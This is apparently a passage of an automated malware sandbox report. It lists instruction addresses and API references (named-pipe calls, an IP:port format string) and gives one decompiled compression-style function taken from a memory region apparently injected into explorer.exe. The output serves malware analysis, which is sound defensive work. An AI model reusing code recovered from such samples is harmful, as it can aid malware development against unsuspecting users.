                                                                                                                                                                                              0x02f83996
                                                                                                                                                                                              0x02f8399b
                                                                                                                                                                                              0x02f8399f
                                                                                                                                                                                              0x02f839a3
                                                                                                                                                                                              0x02f839a5
                                                                                                                                                                                              0x02f839ad
                                                                                                                                                                                              0x02f839b3
                                                                                                                                                                                              0x02f839b7
                                                                                                                                                                                              0x02f839bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f839bb
                                                                                                                                                                                              0x02f8380a
                                                                                                                                                                                              0x02f8396c
                                                                                                                                                                                              0x02f8384c
                                                                                                                                                                                              0x02f8384d
                                                                                                                                                                                              0x02f8384f
                                                                                                                                                                                              0x02f83857
                                                                                                                                                                                              0x02f83858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83858
                                                                                                                                                                                              0x02f83851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83851
                                                                                                                                                                                              0x02f83810
                                                                                                                                                                                              0x02f83813
                                                                                                                                                                                              0x02f8388f
                                                                                                                                                                                              0x02f83891
                                                                                                                                                                                              0x02f83897
                                                                                                                                                                                              0x02f83899
                                                                                                                                                                                              0x02f83936
                                                                                                                                                                                              0x02f83936
                                                                                                                                                                                              0x02f83948
                                                                                                                                                                                              0x02f8394e
                                                                                                                                                                                              0x02f83957
                                                                                                                                                                                              0x02f83958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83958
                                                                                                                                                                                              0x02f8389f
                                                                                                                                                                                              0x02f838a3
                                                                                                                                                                                              0x02f838a6
                                                                                                                                                                                              0x02f8392a
                                                                                                                                                                                              0x02f8392f
                                                                                                                                                                                              0x02f83932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83932
                                                                                                                                                                                              0x02f838a8
                                                                                                                                                                                              0x02f838ab
                                                                                                                                                                                              0x02f838b3
                                                                                                                                                                                              0x02f838b8
                                                                                                                                                                                              0x02f838bd
                                                                                                                                                                                              0x02f838bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f838c3
                                                                                                                                                                                              0x02f838c4
                                                                                                                                                                                              0x02f838c6
                                                                                                                                                                                              0x02f838f5
                                                                                                                                                                                              0x02f83904
                                                                                                                                                                                              0x02f83909
                                                                                                                                                                                              0x02f8390c
                                                                                                                                                                                              0x02f83918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83918
                                                                                                                                                                                              0x02f838c8
                                                                                                                                                                                              0x02f838cc
                                                                                                                                                                                              0x02f838da
                                                                                                                                                                                              0x02f838df
                                                                                                                                                                                              0x02f838e3
                                                                                                                                                                                              0x02f838e4
                                                                                                                                                                                              0x02f838e9
                                                                                                                                                                                              0x02f838ed
                                                                                                                                                                                              0x02f838ed
                                                                                                                                                                                              0x02f838f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f838f1
                                                                                                                                                                                              0x02f83815
                                                                                                                                                                                              0x02f83818
                                                                                                                                                                                              0x02f83860
                                                                                                                                                                                              0x02f83861
                                                                                                                                                                                              0x02f83864
                                                                                                                                                                                              0x02f8386c
                                                                                                                                                                                              0x02f83871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83871
                                                                                                                                                                                              0x02f8381b
                                                                                                                                                                                              0x02f8381e
                                                                                                                                                                                              0x02f83847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f83847
                                                                                                                                                                                              0x02f83823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8382e
                                                                                                                                                                                              0x02f837e7
                                                                                                                                                                                              0x02f83b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02F837B2
                                                                                                                                                                                                • Part of subcall function 02F8D1A6: FlushFileBuffers.KERNEL32(00000000,?,02F83AC6,00000000,00000004), ref: 02F8D1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 02F83B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 283cd8290d873d1603c558deb4b937e6f0e6b9d24f8b9316c0e596715ea396bc
                                                                                                                                                                                              • Instruction ID: d2c3ee0a56e1cfdd498bb4f6371d388a47dc85c021b4e6361685d70c8b3b0109
                                                                                                                                                                                              • Opcode Fuzzy Hash: 283cd8290d873d1603c558deb4b937e6f0e6b9d24f8b9316c0e596715ea396bc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33A1BDB2A08305AFE314FF24CC84E2AF7E9EB84B94F44495EF65596290EB34D905CF52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F94100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E02F94100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E02F97120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E02F95E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E02F95FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E02F95FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E02F97120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E02F95E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                                              0x02f94106
                                                                                                                                                                                              0x02f9410b
                                                                                                                                                                                              0x02f9410f
                                                                                                                                                                                              0x02f94112
                                                                                                                                                                                              0x02f94112
                                                                                                                                                                                              0x02f94115
                                                                                                                                                                                              0x02f9411a
                                                                                                                                                                                              0x02f9411f
                                                                                                                                                                                              0x02f94122
                                                                                                                                                                                              0x02f94127
                                                                                                                                                                                              0x02f9412a
                                                                                                                                                                                              0x02f94130
                                                                                                                                                                                              0x02f94130
                                                                                                                                                                                              0x02f9413b
                                                                                                                                                                                              0x02f9413e
                                                                                                                                                                                              0x02f94145
                                                                                                                                                                                              0x02f9414a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94150
                                                                                                                                                                                              0x02f94155
                                                                                                                                                                                              0x02f94155
                                                                                                                                                                                              0x02f9415a
                                                                                                                                                                                              0x02f94160
                                                                                                                                                                                              0x02f9416a
                                                                                                                                                                                              0x02f9416f
                                                                                                                                                                                              0x02f94175
                                                                                                                                                                                              0x02f94194
                                                                                                                                                                                              0x02f94197
                                                                                                                                                                                              0x02f941a2
                                                                                                                                                                                              0x02f941a2
                                                                                                                                                                                              0x02f941a2
                                                                                                                                                                                              0x02f94199
                                                                                                                                                                                              0x02f94199
                                                                                                                                                                                              0x02f9419b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9419d
                                                                                                                                                                                              0x02f9419d
                                                                                                                                                                                              0x02f9419d
                                                                                                                                                                                              0x02f9419b
                                                                                                                                                                                              0x02f941aa
                                                                                                                                                                                              0x02f941af
                                                                                                                                                                                              0x02f941b4
                                                                                                                                                                                              0x02f941ba
                                                                                                                                                                                              0x02f941be
                                                                                                                                                                                              0x02f941c1
                                                                                                                                                                                              0x02f941c4
                                                                                                                                                                                              0x02f941ca
                                                                                                                                                                                              0x02f941cf
                                                                                                                                                                                              0x02f941d2
                                                                                                                                                                                              0x02f941d8
                                                                                                                                                                                              0x02f941dd
                                                                                                                                                                                              0x02f941e3
                                                                                                                                                                                              0x02f941e9
                                                                                                                                                                                              0x02f941ee
                                                                                                                                                                                              0x02f941f1
                                                                                                                                                                                              0x02f941f6
                                                                                                                                                                                              0x02f941fa
                                                                                                                                                                                              0x02f941fe
                                                                                                                                                                                              0x02f94201
                                                                                                                                                                                              0x02f94204
                                                                                                                                                                                              0x02f9420d
                                                                                                                                                                                              0x02f94214
                                                                                                                                                                                              0x02f94217
                                                                                                                                                                                              0x02f9421a
                                                                                                                                                                                              0x02f9421f
                                                                                                                                                                                              0x02f94224
                                                                                                                                                                                              0x02f94227
                                                                                                                                                                                              0x02f9422a
                                                                                                                                                                                              0x02f9422a
                                                                                                                                                                                              0x02f9422e
                                                                                                                                                                                              0x02f94237
                                                                                                                                                                                              0x02f9423e
                                                                                                                                                                                              0x02f94241
                                                                                                                                                                                              0x02f94246
                                                                                                                                                                                              0x02f9424b
                                                                                                                                                                                              0x02f9424b
                                                                                                                                                                                              0x02f9424e
                                                                                                                                                                                              0x02f94253
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94177
                                                                                                                                                                                              0x02f94179
                                                                                                                                                                                              0x02f94186
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94186
                                                                                                                                                                                              0x02f94179
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94175
                                                                                                                                                                                              0x02f94259
                                                                                                                                                                                              0x02f9425e
                                                                                                                                                                                              0x02f94261
                                                                                                                                                                                              0x02f94264
                                                                                                                                                                                              0x02f9430f
                                                                                                                                                                                              0x02f9430f
                                                                                                                                                                                              0x02f9426a
                                                                                                                                                                                              0x02f9426a
                                                                                                                                                                                              0x02f9426a
                                                                                                                                                                                              0x02f9426f
                                                                                                                                                                                              0x02f94299
                                                                                                                                                                                              0x02f9429c
                                                                                                                                                                                              0x02f9429c
                                                                                                                                                                                              0x02f942a1
                                                                                                                                                                                              0x02f942a3
                                                                                                                                                                                              0x02f942a5
                                                                                                                                                                                              0x02f942a8
                                                                                                                                                                                              0x02f942ab
                                                                                                                                                                                              0x02f942b3
                                                                                                                                                                                              0x02f942b8
                                                                                                                                                                                              0x02f942b8
                                                                                                                                                                                              0x02f942be
                                                                                                                                                                                              0x02f942c1
                                                                                                                                                                                              0x02f942c4
                                                                                                                                                                                              0x02f942c7
                                                                                                                                                                                              0x02f942c9
                                                                                                                                                                                              0x02f942c9
                                                                                                                                                                                              0x02f942ca
                                                                                                                                                                                              0x02f942ca
                                                                                                                                                                                              0x02f942c7
                                                                                                                                                                                              0x02f942d8
                                                                                                                                                                                              0x02f942db
                                                                                                                                                                                              0x02f942df
                                                                                                                                                                                              0x02f942e4
                                                                                                                                                                                              0x02f942e7
                                                                                                                                                                                              0x02f942ea
                                                                                                                                                                                              0x02f942ea
                                                                                                                                                                                              0x02f942ea
                                                                                                                                                                                              0x02f942ed
                                                                                                                                                                                              0x02f942ed
                                                                                                                                                                                              0x02f942f0
                                                                                                                                                                                              0x02f942f0
                                                                                                                                                                                              0x02f94271
                                                                                                                                                                                              0x02f94271
                                                                                                                                                                                              0x02f94281
                                                                                                                                                                                              0x02f94284
                                                                                                                                                                                              0x02f94289
                                                                                                                                                                                              0x02f94289
                                                                                                                                                                                              0x02f9428c
                                                                                                                                                                                              0x02f9428f
                                                                                                                                                                                              0x02f94292
                                                                                                                                                                                              0x02f94294
                                                                                                                                                                                              0x02f94294
                                                                                                                                                                                              0x02f942f3
                                                                                                                                                                                              0x02f942f5
                                                                                                                                                                                              0x02f942f8
                                                                                                                                                                                              0x02f942f8
                                                                                                                                                                                              0x02f942fe
                                                                                                                                                                                              0x02f94302
                                                                                                                                                                                              0x02f94305
                                                                                                                                                                                              0x02f94307
                                                                                                                                                                                              0x02f94307
                                                                                                                                                                                              0x02f94318
                                                                                                                                                                                              0x02f9431a
                                                                                                                                                                                              0x02f9431a
                                                                                                                                                                                              0x02f94322
                                                                                                                                                                                              0x02f94330
                                                                                                                                                                                              0x02f94333
                                                                                                                                                                                              0x02f94335
                                                                                                                                                                                              0x02f94355
                                                                                                                                                                                              0x02f94355
                                                                                                                                                                                              0x02f94358
                                                                                                                                                                                              0x02f9435e
                                                                                                                                                                                              0x02f9435f
                                                                                                                                                                                              0x02f94362
                                                                                                                                                                                              0x02f94364
                                                                                                                                                                                              0x02f94367
                                                                                                                                                                                              0x02f9436a
                                                                                                                                                                                              0x02f9436d
                                                                                                                                                                                              0x02f94371
                                                                                                                                                                                              0x02f94374
                                                                                                                                                                                              0x02f94377
                                                                                                                                                                                              0x02f9437a
                                                                                                                                                                                              0x02f9437c
                                                                                                                                                                                              0x02f9437c
                                                                                                                                                                                              0x02f9437f
                                                                                                                                                                                              0x02f94381
                                                                                                                                                                                              0x02f94381
                                                                                                                                                                                              0x02f94384
                                                                                                                                                                                              0x02f94386
                                                                                                                                                                                              0x02f94389
                                                                                                                                                                                              0x02f94391
                                                                                                                                                                                              0x02f94394
                                                                                                                                                                                              0x02f94399
                                                                                                                                                                                              0x02f94399
                                                                                                                                                                                              0x02f9439f
                                                                                                                                                                                              0x02f943a2
                                                                                                                                                                                              0x02f943a5
                                                                                                                                                                                              0x02f943a7
                                                                                                                                                                                              0x02f943a7
                                                                                                                                                                                              0x02f943a8
                                                                                                                                                                                              0x02f943a8
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b6
                                                                                                                                                                                              0x02f943b9
                                                                                                                                                                                              0x02f943b9
                                                                                                                                                                                              0x02f943bc
                                                                                                                                                                                              0x02f943bc
                                                                                                                                                                                              0x02f9437f
                                                                                                                                                                                              0x02f943bf
                                                                                                                                                                                              0x02f943c2
                                                                                                                                                                                              0x02f943c5
                                                                                                                                                                                              0x02f943c7
                                                                                                                                                                                              0x02f943ca
                                                                                                                                                                                              0x02f943cc
                                                                                                                                                                                              0x02f943cf
                                                                                                                                                                                              0x02f943d2
                                                                                                                                                                                              0x02f943d4
                                                                                                                                                                                              0x02f943d7
                                                                                                                                                                                              0x02f943df
                                                                                                                                                                                              0x02f943e7
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943f0
                                                                                                                                                                                              0x02f943f6
                                                                                                                                                                                              0x02f943f8
                                                                                                                                                                                              0x02f943f8
                                                                                                                                                                                              0x02f943fe
                                                                                                                                                                                              0x02f94404
                                                                                                                                                                                              0x02f9440d
                                                                                                                                                                                              0x02f94414
                                                                                                                                                                                              0x02f94416
                                                                                                                                                                                              0x02f94419
                                                                                                                                                                                              0x02f94419
                                                                                                                                                                                              0x02f9441c
                                                                                                                                                                                              0x02f9441c
                                                                                                                                                                                              0x02f9441f
                                                                                                                                                                                              0x02f94421
                                                                                                                                                                                              0x02f94424
                                                                                                                                                                                              0x02f94426
                                                                                                                                                                                              0x02f94441
                                                                                                                                                                                              0x02f94441
                                                                                                                                                                                              0x02f94445
                                                                                                                                                                                              0x02f94448
                                                                                                                                                                                              0x02f9444b
                                                                                                                                                                                              0x02f9444e
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94450
                                                                                                                                                                                              0x02f94450
                                                                                                                                                                                              0x02f94452
                                                                                                                                                                                              0x02f94456
                                                                                                                                                                                              0x02f94459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9445b
                                                                                                                                                                                              0x02f9445b
                                                                                                                                                                                              0x02f9445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445d
                                                                                                                                                                                              0x02f94459
                                                                                                                                                                                              0x02f94468
                                                                                                                                                                                              0x02f9446b
                                                                                                                                                                                              0x02f94470
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447d
                                                                                                                                                                                              0x02f94428
                                                                                                                                                                                              0x02f94428
                                                                                                                                                                                              0x02f9442a
                                                                                                                                                                                              0x02f94431
                                                                                                                                                                                              0x02f94431
                                                                                                                                                                                              0x02f94433
                                                                                                                                                                                              0x02f94435
                                                                                                                                                                                              0x02f94437
                                                                                                                                                                                              0x02f9443b
                                                                                                                                                                                              0x02f9443d
                                                                                                                                                                                              0x02f9443f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9443f
                                                                                                                                                                                              0x02f9443b
                                                                                                                                                                                              0x02f9442c
                                                                                                                                                                                              0x02f9442c
                                                                                                                                                                                              0x02f9442f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9442f
                                                                                                                                                                                              0x02f9442a
                                                                                                                                                                                              0x02f94487
                                                                                                                                                                                              0x02f94489
                                                                                                                                                                                              0x02f94489
                                                                                                                                                                                              0x02f94494
                                                                                                                                                                                              0x02f94337
                                                                                                                                                                                              0x02f94337
                                                                                                                                                                                              0x02f9433a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9433c
                                                                                                                                                                                              0x02f9433c
                                                                                                                                                                                              0x02f9433e
                                                                                                                                                                                              0x02f94342
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f94344
                                                                                                                                                                                              0x02f94344
                                                                                                                                                                                              0x02f94344
                                                                                                                                                                                              0x02f94347
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9434b
                                                                                                                                                                                              0x02f94354
                                                                                                                                                                                              0x02f94354
                                                                                                                                                                                              0x02f94347
                                                                                                                                                                                              0x02f94342
                                                                                                                                                                                              0x02f9433a
                                                                                                                                                                                              0x02f94326
                                                                                                                                                                                              0x02f9432f
                                                                                                                                                                                              0x02f9432f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
